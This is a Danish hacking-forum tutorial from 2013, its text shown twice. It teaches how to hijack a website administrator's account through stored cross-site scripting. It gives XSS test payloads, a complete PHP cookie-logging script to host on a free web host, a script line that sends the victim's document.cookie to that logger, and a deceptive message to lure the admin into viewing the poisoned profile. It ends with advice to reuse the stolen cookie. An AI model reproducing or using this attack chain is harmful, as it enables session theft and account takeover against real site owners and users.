04-12-2013, 11:04
Hey ss! :D
I dag skal vi se lidt på at hacke lidt sites :D
Jeg er ikke ansvarlig for den måde i bruge den læring jeg giver jer.
Okay... Du skal bruge lidt viden inden for Cross site scripting også kaldet "XSS."
Jeg kan opfordre jeg til at se den her tråd til at starte med: https://www.shellsec.pw/showthread.php?tid=264
Vi skal nemlig benytte os af cookie stealing.
Hvad er cookie stealing?
Cookie stealing bliver brugt til at stjæle login information fra enten et udvalgt mål, eller en masse forskellige. Det gør man ved hjælp af XSS (croos site scripting.) Det får så target til at sende en forspørgesel til en side (vores cookie stealer) for så at stjæle cookien, og derefter blive vider stillet til en 3 sidde, dette kan ske uden brugern opdager noget som helst. En cookiestealer køre over JavaScript, dvs. at stort set alle elektroniske apperater kan bruges, bare der har javascript.
Test om den er vuln!
Godt, det første vi gør er at oprette en bruger på vores target (altså vores site) Lad os sige gustav.com/user/registre/
Vi laver så en bruger hvor vi giver nogle random oplysnigner (mail osv.)
Så skal vi så lidt igang.
Nu går du så ind og ændre dit navn under "Edit Profile" til:
Tillader din sitet ikke det kan du evt. prøve det mest standart i xss, nemlig at få en alert frem, og som den artikel jeg linkede til kan vi så se det er:
Nogle gange er der sat et filter på sådan så man ikke kan skrive det... Fin evt andre steder i din profil hvor du kan indsætte de codes.
Det kunne eks. være "Om dig (skriv en profil tekst)"
Godt, kommer shellsec's side op når du går ind på din bruger (hvis du bruger det første xss script jeg gav) så er den vuln, brugte du det andet xss script ejg gav skulle der gerne komme en alert boks op hvor der står "XSS"
Forberedelse til vores angreb
Nu skal vi så have sat vores cookiestealer op. Det gør vi sådan her:
1 Gå til 000webhoste og opret en bruger. Derefter gå til "File Manager"
Her trykker du så på "publich html" og sletter alt i mappen.
2 Nu åbner du et notepad dokoment og kopier følgende:
Du gemmer det så som "lycia.php"
3:
Gå tilbage til 00webhoste og filemanager.
Du trykker så på "uploade file" og uploader så "lycia.php" nu går du så til din hjemmeside:
http://www.dinside.bla.bla.bla/lycia.php
Nu skulle der så gerne være kommet en fil i File Manager der hedder "log.txt"
Nu har vi sat vores cookie stealer op. Slet filen der hedder "log.txt"
Udnyttelse
Okay nu skal vi igang.
Gå ind kopier urlen fra din bruger, og edit så dit profil navn til:
Opret en ny profil hvor du kalder dig et eller andet, skriv fra den profil til admin noget alla:
Når admin så går ind på den bruger kommer der igen en "log.txt" fil i File Manager.
Nu indsætter vi så admins cookie i vores egen (Søg evt på hvordan man gør, der er en masse guides hvor man bruger det efter man eks har stjålet cookies på et nal netværk.
Lycia Out.
I dag skal vi se lidt på at hacke lidt sites :D
Jeg er ikke ansvarlig for den måde i bruge den læring jeg giver jer.
Okay... Du skal bruge lidt viden inden for Cross site scripting også kaldet "XSS."
Jeg kan opfordre jeg til at se den her tråd til at starte med: https://www.shellsec.pw/showthread.php?tid=264
Vi skal nemlig benytte os af cookie stealing.
Hvad er cookie stealing?
Cookie stealing bliver brugt til at stjæle login information fra enten et udvalgt mål, eller en masse forskellige. Det gør man ved hjælp af XSS (croos site scripting.) Det får så target til at sende en forspørgesel til en side (vores cookie stealer) for så at stjæle cookien, og derefter blive vider stillet til en 3 sidde, dette kan ske uden brugern opdager noget som helst. En cookiestealer køre over JavaScript, dvs. at stort set alle elektroniske apperater kan bruges, bare der har javascript.
Test om den er vuln!
Godt, det første vi gør er at oprette en bruger på vores target (altså vores site) Lad os sige gustav.com/user/registre/
Vi laver så en bruger hvor vi giver nogle random oplysnigner (mail osv.)
Så skal vi så lidt igang.
Nu går du så ind og ændre dit navn under "Edit Profile" til:
Kode:
<script>window.location="http://shellsec.pw/"</script>
Kode:
<script>alert("XSS")</script>
Det kunne eks. være "Om dig (skriv en profil tekst)"
Godt, kommer shellsec's side op når du går ind på din bruger (hvis du bruger det første xss script jeg gav) så er den vuln, brugte du det andet xss script ejg gav skulle der gerne komme en alert boks op hvor der står "XSS"
Forberedelse til vores angreb
Nu skal vi så have sat vores cookiestealer op. Det gør vi sådan her:
1 Gå til 000webhoste og opret en bruger. Derefter gå til "File Manager"
Her trykker du så på "publich html" og sletter alt i mappen.
2 Nu åbner du et notepad dokoment og kopier følgende:
Kode:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
3:
Gå tilbage til 00webhoste og filemanager.
Du trykker så på "uploade file" og uploader så "lycia.php" nu går du så til din hjemmeside:
http://www.dinside.bla.bla.bla/lycia.php
Nu skulle der så gerne være kommet en fil i File Manager der hedder "log.txt"
Nu har vi sat vores cookie stealer op. Slet filen der hedder "log.txt"
Udnyttelse
Okay nu skal vi igang.
Gå ind kopier urlen fra din bruger, og edit så dit profil navn til:
Kode:
<script>location.href = 'http://www.dinside.bla.bla.bla/lycia.php?cookie='+document.cookie;</script>
Kode:
Hej admin jeg synes en bruger har nogle underlige udtagleser i hans profiltekst hvor i han skriver at han ikke kan lide "navn på forumet" og at han bare vil spame. Det er ham her: "link til den første bruger du lavede..."
Nu indsætter vi så admins cookie i vores egen (Søg evt på hvordan man gør, der er en masse guides hvor man bruger det efter man eks har stjålet cookies på et nal netværk.
Lycia Out.